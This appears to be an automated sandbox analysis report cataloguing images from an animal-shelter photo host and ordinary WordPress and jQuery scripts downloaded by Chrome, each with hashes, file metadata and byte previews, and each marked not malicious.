                                                                                                                                                                                                                                                        SHA-256:41D4F3DCE983AF12342CDCB8F1CB7CF26A967C3C006E2EA3C9082884042493FD
                                                                                                                                                                                                                                                        SHA-512:6E5610F68834704FED4C47773176A49613EDC516E6C8ACB7E3B60B4FEF1181E0E5F93FEC5128E4C6E4381E4832886569CE02457EA0A78BE23D5C7562FC323A7E
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        URL:https://g.petango.com/photos/352/e9dac8f4-5d42-4282-b360-1c17bf4033f7.jpg
                                                                                                                                                                                                                                                        Preview:......JFIF.....`.`..............................................................................................................................................0...."........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..+|}....Q..Tvg62.@;.TJ..\.;...q....qUD.9..0..j........X....t..'.S,.....Y.x9.L...}+<....O.t.Z^.qHO$.=kB.....8.8...j.2..4t6..2+V'...Z.+..R.Q.=*....)Y`l.A.../...drC....<g;5....b.i..5..q.pG...].M.;..........k..0G....~{|.o........~..Nb...v.........pw.V.U.w....U....S.j....=....w..WA.........@A.X..8......@.F..'=:U.p>by..:..1..QF}i..{..1..W.g.....;..*q...f..<P..F.J..9....x?6qU..*..s
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (6198), with no line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):6198
                                                                                                                                                                                                                                                        Entropy (8bit):5.206753677523754
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:192:MZ14qyTyyCjDBHzo/PZNsZ65Vt8yrqcdtIDxNiCx:Mr4qGSJonZN+EVt8yrqcdtIDXfx
                                                                                                                                                                                                                                                        MD5:AA35605D0E84C09643876BED5D697FDA
                                                                                                                                                                                                                                                        SHA1:BF9A600E794A756191247FBBC9F48FFB5AE24A6B
                                                                                                                                                                                                                                                        SHA-256:ACFC1F89313411D254AF6BB6B1721718FA6FAB02A266784AD743FE37ABB370A8
                                                                                                                                                                                                                                                        SHA-512:870757B43DC7A623A7CA90C6CD2157910940FC90297F483837249F04A2BBCFC65228317CD4D80BF1B7FFCE47B684AAF2E6F71C16EA2EA08B07793C1DDB47304B
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        Preview:(()=>{var t={72484:(t,e,o)=>{((e,n)=>{const s=o(21715),a=o(44281),i={init:()=>{TCB_Front.Utils.isEditorPage()||(e(".thrv_social.thrv_social_custom").each(((t,o)=>i.initUI(e(o)))),i.initButtons(),e("body").on("click",".thrv_social_custom:not(.thrv_social_follow) .tve_s_item",(function(){const t=e(this),o=t.attr("data-s");a[o]&&a[o](t)})),e(".thrv_social_follow").each(((t,o)=>{let n=!0;e(o).find(".tve_s_item").each(((t,o)=>{const s=e(o);s.find("a").attr("href")?n=!1:s.hide()})),n&&o.style.setProperty("display","none","important")}))),s.initShareCounts()},initUI:t=>{const e=n.Utils.jsonParse(t,"data-device-config"),o=n.getDisplayType();if(e[o]){const n=e[o],s=n.button_type||"tve_social_itb",a=1===parseInt(n.isFullWidth),i=n.showCount,r=1===parseInt(n.isVertical),c=t.find(".tve_social_items").attr("class").replace(/(tve_social_items|tve_social_custom)/g,"").match(/(\s+)?tve_social_([a-z]{2,3})/),d=c?"tve_social_"+c[2]:"tve_social_itb";d!==s&&t.find(".tve_social_items").removeClass(d).addCl
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=14, orientation=upper-left, resolutionunit=2, manufacturer=Apple, model=iPhone 12, xresolution=198, yresolution=206, software=17.4.1, datetime=2024:08:16 13:09:57, hostcomputer=iPhone 12, xresolution=251, yresolution=259, GPS-Data], baseline, precision 8, 315x420, components 3
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):38589
                                                                                                                                                                                                                                                        Entropy (8bit):7.866324693133393
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:768:TGGs72VTKLpApV0MMezf33rHAxHr0p6BVZSliA/FwlEhoGWFZ/zig0:SGs72SqMQMxHrY6BVZ3obur+B
                                                                                                                                                                                                                                                        MD5:7D2AE00B15B543A8A72391D8BBA0E961
                                                                                                                                                                                                                                                        SHA1:20199C24F0D3CBC9618E7372B96E7CF8A4C39861
                                                                                                                                                                                                                                                        SHA-256:BFEECC76E36BADC9A69921DFCB5D5D84E69E1C67DD659DFE8DB5AE4F89DA5D83
                                                                                                                                                                                                                                                        SHA-512:08503511325A48D585895CD5D26EA6DD64551D08FE8E1A907199C871B8AEC40669270F097C4301431F8853CED48252EACB806389D6CBF7E8E31F87501877349B
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        URL:https://g.petango.com/photos/352/a0e8fe39-b7b2-4f7f-a7b1-afe0c240e5ef.jpg
                                                                                                                                                                                                                                                        Preview:......JFIF.....H.H......Exif..II*...................(.......................................................................1...........2...........<...................................i...........%...............Apple.iPhone 12.H.......H.......17.4.1.2024:08:16 13:09:57.iPhone 12.H.......H......."."...........'.......d...........0232............................................088.........088.........0100....................................................................................................................................2...........3...........4...,....................................... ...........4...........H...........P...........X...........`...........h...........p...|...Y...x.......-04:00.-04:00.-04:00.................................Apple.iPhone 12 back dual wide camera 4.2mm f/1.6.....<...........2024:08:16 13:09:57.2024:08:16 13:09:57......(..o8...)..e/..V.........................k.Apple iOS...MM.-.......................0.......h...0..............................
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (422)
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):457
                                                                                                                                                                                                                                                        Entropy (8bit):5.062678748736029
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:12:Uz77mxDChzQiwBmGam7vp9PSu7QqBYAQ7:Q778Ch3wBmGH7vKM7ux
                                                                                                                                                                                                                                                        MD5:E4BC17CC45CA91AB0F09DEA134975C51
                                                                                                                                                                                                                                                        SHA1:3C03312717FB495C051D02A3D27EC0D8ABC2557D
                                                                                                                                                                                                                                                        SHA-256:5A43A22E48F94B7A45A9A9B1A107F197213B73307FDFA2E6B2DAADAB264F94D2
                                                                                                                                                                                                                                                        SHA-512:F8E537A2168B94875BB7DDB9A20037C5BC79831C8B4E726F224F8D7C723C5C4B4512551697CF7BFB6CE4B5F8365DC1C027107FFE3435EA27C686F5AE96D921E7
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        Preview:/*! This file is auto-generated */.(()=>{"use strict";var e={d:(t,d)=>{for(var o in d)e.o(d,o)&&!e.o(t,o)&&Object.defineProperty(t,o,{enumerable:!0,get:d[o]})},o:(e,t)=>Object.prototype.hasOwnProperty.call(e,t)},t={};function d(e){"undefined"!=typeof document&&("complete"!==document.readyState&&"interactive"!==document.readyState?document.addEventListener("DOMContentLoaded",e):e())}e.d(t,{default:()=>d}),(window.wp=window.wp||{}).domReady=t.default})();
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (2322)
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):2358
                                                                                                                                                                                                                                                        Entropy (8bit):5.195542061276913
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:48:Q7ZoaXCwG54t8hsQ9UxKQX75wwQ0sGvayxGaiGBZk0K8PO2:wxXCwG5bhsCQaysjnXK
                                                                                                                                                                                                                                                        MD5:D60D16ABC088D80092CEF147505A08E4
                                                                                                                                                                                                                                                        SHA1:681FBFEB2A611E0DB7620DFC72AF70A76AA67A7A
                                                                                                                                                                                                                                                        SHA-256:CF1AA9163953FB477FE5CF452229042578738FA9E600C6EF64C47E4635BA78C2
                                                                                                                                                                                                                                                        SHA-512:57100E48A4A04B95910CF5F2967883D8D259B2B68C82F0EAA12BBDE4D6DDFBE7710CD741DB8E727172CC0BB27B8825AFD8A72C2A34412F242B951F6ED47B60FA
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        URL:https://149955744.v2.pressablecdn.com/wp-includes/js/dist/a11y.min.js?ver=3156534cc54473497e14
                                                                                                                                                                                                                                                        Preview:/*! This file is auto-generated */.(()=>{"use strict";var e={n:t=>{var n=t&&t.__esModule?()=>t.default:()=>t;return e.d(n,{a:n}),n},d:(t,n)=>{for(var o in n)e.o(n,o)&&!e.o(t,o)&&Object.defineProperty(t,o,{enumerable:!0,get:n[o]})},o:(e,t)=>Object.prototype.hasOwnProperty.call(e,t),r:e=>{"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})}},t={};e.r(t),e.d(t,{setup:()=>p,speak:()=>d});const n=window.wp.domReady;var o=e.n(n);function i(e="polite"){const t=document.createElement("div");t.id=`a11y-speak-${e}`,t.className="a11y-speak-region",t.setAttribute("style","position: absolute;margin: -1px;padding: 0;height: 1px;width: 1px;overflow: hidden;clip: rect(1px, 1px, 1px, 1px);-webkit-clip-path: inset(50%);clip-path: inset(50%);border: 0;word-wrap: normal !important;"),t.setAttribute("aria-live",e),t.setAttribute("aria-relevant","additions text"),t.setAttribute("aria-atomic","true");con
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:GIF image data, version 89a, 200 x 197
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):4250
                                                                                                                                                                                                                                                        Entropy (8bit):7.72665586400111
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:96:i1fnVISmTZBTWgolQAFu4i5Ijv0iaR3TBs6UJ6HvAIKcR4DXk:UtISOfT7PUu4+KCR3a2LCDXk
                                                                                                                                                                                                                                                        MD5:6A30643CF57E42825EB01FB6719BFE62
                                                                                                                                                                                                                                                        SHA1:6A79F1B9A56E74CEEE8B0425AFE185872A74FB80
                                                                                                                                                                                                                                                        SHA-256:C8A889D414336ED9FE7D2E563161DBA0FDE3A0FDCED1949B3850F099DFF03514
                                                                                                                                                                                                                                                        SHA-512:2BDCC1208B7081870A74B2638C255FD7C2A9DF02BA34983A56AE415908E70784F09375864DEC985DE04A1959E61AC7C6E66B363183CA902E69109402132E3BEB
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        URL:https://g.petango.com/shared/Photo-Not-Available-cat.gif
                                                                                                                                                                                                                                                        Preview:GIF89a...................???..}.........///.........___.....OOO..............ooo...............ttq...mmk..........{{w..............................................550..................y........(($PPIxxmSSL..^^Ukkafff........................................................................................................................................................................!.......,............I...,3....................>(,.....0J..................1...I,.........J.+..+/....../(.I(.......+......,...........2.6.....I...HP..A,.*\.L....#.. h...[...#..J.%....EA$M.\.r.K.-_..s.Mw5o...V.JD..p.A.k...@$.h..3."........9U.U...G........]?^8ab.[e&.N..........E.....u!^..U.sK.V. ........x`c..J.<.....n.X...SW..Tbix....}.....^.K.......>G..q..Y..'....d......l..AU..z.....=..6.....P~9<......A:M.....O.~=..\....U..;..s.u..g.=...`..>.O..H0 ..V..9....... ~..G"!.L.@..ep"w... ...... .{.X.x..0A.H.`.......;&.dv.#.,.e...P6...P.........H..q...f.d*..;..cv.Z..4...#.]*c..
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=2, orientation=upper-left], baseline, precision 8, 420x540, components 3
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):40189
                                                                                                                                                                                                                                                        Entropy (8bit):7.974509916133365
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:768:/bOFOjROl0esEXlAvgxAv5rwfRKaCMRNk9u7ifvFz44xwZREFUlz6:/PUPvWvgxi5rdaJRNk8iXO4ORaA6
                                                                                                                                                                                                                                                        MD5:AD22FAB4EBB3563618B31710D8FDE614
                                                                                                                                                                                                                                                        SHA1:26029816C9E04D0E27691DA117D2C970AED64B4C
                                                                                                                                                                                                                                                        SHA-256:07D6C613A054363F3C03EBCA421E9595CF17045FBD609B545BE4E6C2F38B3FE2
                                                                                                                                                                                                                                                        SHA-512:1D40C9D7D1F5383E2CBD26BC02CB2D861A8F39F3E877BF07AF6E309ABF0FC40783115BD3FD88793FB1FD69AACB7A64EDD93D767D6EEF978085FFFAE635124280
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        Preview:......JFIF.....`.`.....XExif..II*...................i.......&.................................................................................................................................................................................................."........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....Q..i..oZ.$.....V&5.l....$..W.....Z.T...pq.X..^.R..y.D...mYR...b...6.>...k.t.VH..V<...k~-...S,...Z.].;....QK..V.n..Q^I..]7p&_9..zu..Q...}Kl.ZF...PH.c?=i7....&..y.@.VOSOYFz.....S@.I/59.#.Y.)......i...q...R3Q..Y..F.........n9*./.+62zf....+..(..G8.PV.Z..(`..N:....Z...o..8.MX..<6...S...j..&
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:PNG image data, 900 x 629, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):562791
                                                                                                                                                                                                                                                        Entropy (8bit):7.993861371657771
                                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                                        SSDEEP:12288:NlbpZbgshq2MbyY2n+AW31EY8FCvV+SUcDpmGByUJuTdALyP:jbpZbg+MbTHAW31EY8FCt+hGBy7eWP
                                                                                                                                                                                                                                                        MD5:19C0F31870AB2EE79EA8E3381B7FD7EB
                                                                                                                                                                                                                                                        SHA1:BFFE16A30F62A24E950889FCD2EBD25CD38EB753
                                                                                                                                                                                                                                                        SHA-256:65D30ED7C67067C1174F8FB7A774F55848E363DFE8F9A6F5CB5AFA2CD57B84F4
                                                                                                                                                                                                                                                        SHA-512:F0C3D4EA4C264C6188283EEBC767C1FA7A7C2CB21721A68AFC5BBD765558CB38614CCDB544E5FCD026FFF3F3679E7E939E9ED923F335EE5AECB4F5E653AD1310
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        Preview:.PNG........IHDR.......u.......>3....gAMA......a....IiCCPsRGB IEC61966-2.1..H..SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m....... ......O.
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=13, orientation=upper-left, resolutionunit=2, manufacturer=Google, model=Pixel 5, xresolution=185, yresolution=193, software=HDR+ 1.0.604778939zd, datetime=2024:09:05 18:42:27, xresolution=242, yresolution=250, GPS-Data], baseline, precision 8, 420x560, components 3
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):62443
                                                                                                                                                                                                                                                        Entropy (8bit):7.94703391189811
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:1536:FL3bh2QrT7CKUl4SMdc7c7PLUS5XUfFPP+zukzNQhdD/AqTi8:iQr/ollc7PLUuEfR6ukED/AC1
                                                                                                                                                                                                                                                        MD5:7F16CCE5F8288C1FA3C64A8D7530DE1D
                                                                                                                                                                                                                                                        SHA1:46F42E873DFD7BD9A2D5064DA3AD7ED4C68608BE
                                                                                                                                                                                                                                                        SHA-256:17E0774942AE86B663BC03D47B0E221E4F36E905CB9E03B29B3D1A314F1F1F05
                                                                                                                                                                                                                                                        SHA-512:C7619E442C2C546C1A9B56B4F243E8720EAFE1A0B68799B095A0620D3D673836DED009FA1E67646632AA65BB72F0DE4BDDDC3EE222655C452620E6B5FE6589D1
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        URL:https://g.petango.com/photos/352/1c1820a3-ebd4-4ae2-bd1e-da7502e4eee4.jpg
                                                                                                                                                                                                                                                        Preview:......JFIF.....H.H......Exif..II*...................(.......................................................................1...........2...................................i...........%...............Google.Pixel 5.H.......H.......HDR+ 1.0.604778939zd.2024:09:05 18:42:27.H.......H.......(."...........'.......$...........0232............................................222.........222.........222.........0100................................................................................................................................................................................................3...........4..."...............&.......................6...........J...........^...........f...........n...........v...........~...........................................-04:00.-04:00.-04:00.Google.Pixel 5 back camera 4.38mm f/1.73..2..@B......d...2024:09:05 18:42:27.2024:09:05 18:42:27.s...d.......d.......d...............d.................................................N...........W.........
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=14, orientation=upper-left, resolutionunit=2, manufacturer=Apple, model=iPhone 14 Pro, xresolution=202, yresolution=210, software=18.0.1, datetime=2024:11:16 13:46:27, hostcomputer=iPhone 14 Pro, xresolution=259, yresolution=267, GPS-Data], baseline, precision 8, 420x652, components 3
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):110502
                                                                                                                                                                                                                                                        Entropy (8bit):7.946883693242955
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3072:E3vjyJSthajOa9KLoTFvk1807XnbUFmxudKhPm3:E3vjyJSTajODiWi07XnAaQKhO3
                                                                                                                                                                                                                                                        MD5:44C2CC1C41528A20888F73BD3BD74B91
                                                                                                                                                                                                                                                        SHA1:6B59841211791E15553D20C61746F82A803F1E8F
                                                                                                                                                                                                                                                        SHA-256:86F66C1BB77F117B8874E7F9268CD83DE91A8208789DF668244C7088C62D07CB
                                                                                                                                                                                                                                                        SHA-512:A04AE4B6964B8C5FB6134390379CD2EF12FCE7F1C2725AFB4691AC02BF106C738E6E9B717756EFE939DFB1A2D8F1A1A5CBC91FAA7BCDD11B639654004E15824C
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        Preview:......JFIF.....H.H......Exif..II*...................(.......................................................................1...........2...........<...................................i...........%...............Apple.iPhone 14 Pro.H.......H.......18.0.1.2024:11:16 13:46:27.iPhone 14 Pro.H.......H......."."...........'.......P...........0232............................................400.........400.........0100....................................................................................................................................2...........3...........4.../...........................#...........+...........?...........S...........[...........c...........k...........s...........{...|...............-05:00.-05:00.-05:00.................L...............Apple.iPhone 14 Pro back triple camera 6.86mm f/1.78.....X...Y...2...2024:11:16 13:46:27.2024:11:16 13:46:27......................-..........W...2.........2.Apple iOS...MM.6...............................h.......................
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (8189)
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):21464
                                                                                                                                                                                                                                                        Entropy (8bit):5.303481082929494
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:384:G/rsrDr8LVyraS3dtrqorqr8hrpCip8fuxNhBGX0CiS9rH/OrLrErJ29FkFvd:iS33Z5vK47kv
                                                                                                                                                                                                                                                        MD5:8FBC22C79D40119DDE9A5D16897002B9
                                                                                                                                                                                                                                                        SHA1:E9837519ACA724457792E2D5EE98A97A0367CDF9
                                                                                                                                                                                                                                                        SHA-256:7E84C9F8D71BC6EB2DAC2FCE59A6CAEA62DA51FFA8CF56B41806F59386AB1322
                                                                                                                                                                                                                                                        SHA-512:3118A198A3710C839C15D6C4B5DC9F9ADCD637913AF2E26F438B01C80B27281F4937E25AAD2817855D8B3EB36207C61AE16D62B17E698799C5316E86F52AC6FC
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        URL:https://149955744.v2.pressablecdn.com/wp-includes/js/jquery/ui/core.min.js?ver=1.13.3
                                                                                                                                                                                                                                                        Preview:/*! jQuery UI - v1.13.3 - 2024-04-26.* https://jqueryui.com.* Includes: widget.js, position.js, data.js, disable-selection.js, effect.js, effects/effect-blind.js, effects/effect-bounce.js, effects/effect-clip.js, effects/effect-drop.js, effects/effect-explode.js, effects/effect-fade.js, effects/effect-fold.js, effects/effect-highlight.js, effects/effect-puff.js, effects/effect-pulsate.js, effects/effect-scale.js, effects/effect-shake.js, effects/effect-size.js, effects/effect-slide.js, effects/effect-transfer.js, focusable.js, form-reset-mixin.js, jquery-patch.js, keycode.js, labels.js, scroll-parent.js, tabbable.js, unique-id.js, widgets/accordion.js, widgets/autocomplete.js, widgets/button.js, widgets/checkboxradio.js, widgets/controlgroup.js, widgets/datepicker.js, widgets/dialog.js, widgets/draggable.js, widgets/droppable.js, widgets/menu.js, widgets/mouse.js, widgets/progressbar.js, widgets/resizable.js, widgets/selectable.js, widgets/selectmenu.js, widgets/slider.js, widgets/sort
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (15752)
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):18726
                                                                                                                                                                                                                                                        Entropy (8bit):4.756109283632968
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:384:WTbvzWuPTb9Uh3o//bEPjXgA2k1efAJmpr:WX6U9Uh3o//YrXgAGfACr
                                                                                                                                                                                                                                                        MD5:B976B651932BFD25B9DDB5B7693D88A7
                                                                                                                                                                                                                                                        SHA1:7FCB7CB5C11227F9213B1E08A07D0212209E1432
                                                                                                                                                                                                                                                        SHA-256:4E6CE5444C7F396CEF0EB1FA3611034151E485DD06FBE5573A5583E1EEBC98C3
                                                                                                                                                                                                                                                        SHA-512:A241EBDCFAF153D5C2A86761145B2575CBE734B4F416ACBFAC082AE5C6EB7C706BD6CA3BC286B7E1A0F9E326729252DCB95B776750C4A3A0D81F2AA6258EA39F
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        Preview:/*! This file is auto-generated */.// Source: wp-includes/js/twemoji.min.js.var twemoji=function(){"use strict";var h={base:"https://cdn.jsdelivr.net/gh/jdecked/twemoji@15.0.3/assets/",ext:".png",size:"72x72",className:"emoji",convert:{fromCodePoint:function(d){d="string"==typeof d?parseInt(d,16):d;if(d<65536)return e(d);return e(55296+((d-=65536)>>10),56320+(1023&d))},toCodePoint:o},onerror:function(){this.parentNode&&this.parentNode.replaceChild(x(this.alt,!1),this)},parse:function(d,u){u&&"function"!=typeof u||(u={callback:u});return h.doNotParse=u.doNotParse,("string"==typeof d?function(d,a){return n(d,function(d){var u,f,c=d,e=N(d),b=a.callback(e,a);if(e&&b){for(f in c="<img ".concat('class="',a.className,'" ','draggable="false" ','alt="',d,'"',' src="',b,'"'),u=a.attributes(d,e))u.hasOwnProperty(f)&&0!==f.indexOf("on")&&-1===c.indexOf(" "+f+"=")&&(c=c.concat(" ",f,'="',u[f].replace(t,r),'"'));c=c.concat("/>")}return c})}:function(d,u){var f,c,e,b,a,t,r,n,o,s,i,l=function d(u,f){v
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=13, orientation=upper-left, resolutionunit=2, manufacturer=Google, model=Pixel 5, xresolution=185, yresolution=193, software=HDR+ 1.0.604778939zd, datetime=2024:06:20 21:17:18, xresolution=242, yresolution=250, GPS-Data], baseline, precision 8, 420x420, components 3
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):46602
                                                                                                                                                                                                                                                        Entropy (8bit):7.916456485630772
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:768:HSjpLgYyokHPrQ24s6n3VM82uhDG9GP7H5oxh7xTmkPzP1ou1iRiIUt3TbPUU7b2:yjyMkUxn3VM8acP7K7xTmg5rVtHc+bs3
                                                                                                                                                                                                                                                        MD5:A5B82CADCA61ED6517DB5AC3970D87A8
                                                                                                                                                                                                                                                        SHA1:0023CD20F664190BF3B00F91C659FCFFDEE28371
                                                                                                                                                                                                                                                        SHA-256:0CBC093B30706BC775D6CD81E8C690DC643F5E8A0302427A4D9E2DD089AFDB7C
                                                                                                                                                                                                                                                        SHA-512:3C89B7FFB2A7672D85E7FBC63FB3C3A621A71FD50CB273C010D209124080330151E0CA5725B95D18CE955C34BF548C274A7076F219C625CB030DF0EB2887C3B9
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        URL:https://g.petango.com/photos/352/5b32b2a8-d2d1-4503-a972-110fb5733d74.jpg
                                                                                                                                                                                                                                                        Preview:......JFIF.....H.H......Exif..II*...................(.......................................................................1...........2...................................i...........%...............Google.Pixel 5.H.......H.......HDR+ 1.0.604778939zd.2024:06:20 21:17:18.H.......H.......)."...........'.......N...........0232............................................816.........816.........816.........0100........w...........t...........................................................................................................................................................................3...........4..."...............2...........:...........B...........V...........j...........r...........z............................................................... ...!...........-04:00.-04:00.-04:00.Google.Pixel 5 back camera 4.38mm f/1.73....@B......d...2024:06:20 21:17:18.2024:06:20 21:17:18.....d.......d.......d...............d...........................f1db890eddbeb50f0000000000000000
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 420x420, components 3
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):45628
                                                                                                                                                                                                                                                        Entropy (8bit):7.979709957228712
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:768:9TiFuGchay7krOsswZpM2WqMoFVUuU9j/uFeDoBBS4kSN++EqwqvPrSYszzgDXUY:9IuGWnkrwwZC2EojUvmUDoBoz+gqvpsC
                                                                                                                                                                                                                                                        MD5:C50F4673D7DE08421B6CD7ADFF5B838D
                                                                                                                                                                                                                                                        SHA1:CD50E9EC955E83B6C85E750EE63748C960FA11A2
                                                                                                                                                                                                                                                        SHA-256:4FC8037F103A3CE2E6D0D3D0CC8A37D57CEA344DCC4774B01587C64C85AC6E5E
                                                                                                                                                                                                                                                        SHA-512:19CB295498BA3995F4CC587B8FCA0824319F00B63FA56440651B7A844C3C736875224C119B23C59922CABF22A98DAEC47DDE9A75DD08B2F4E834B86335F573C0
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        URL:https://g.petango.com/photos/352/6ff84da6-dadf-4c18-b0cb-b36ae750aa72.jpg
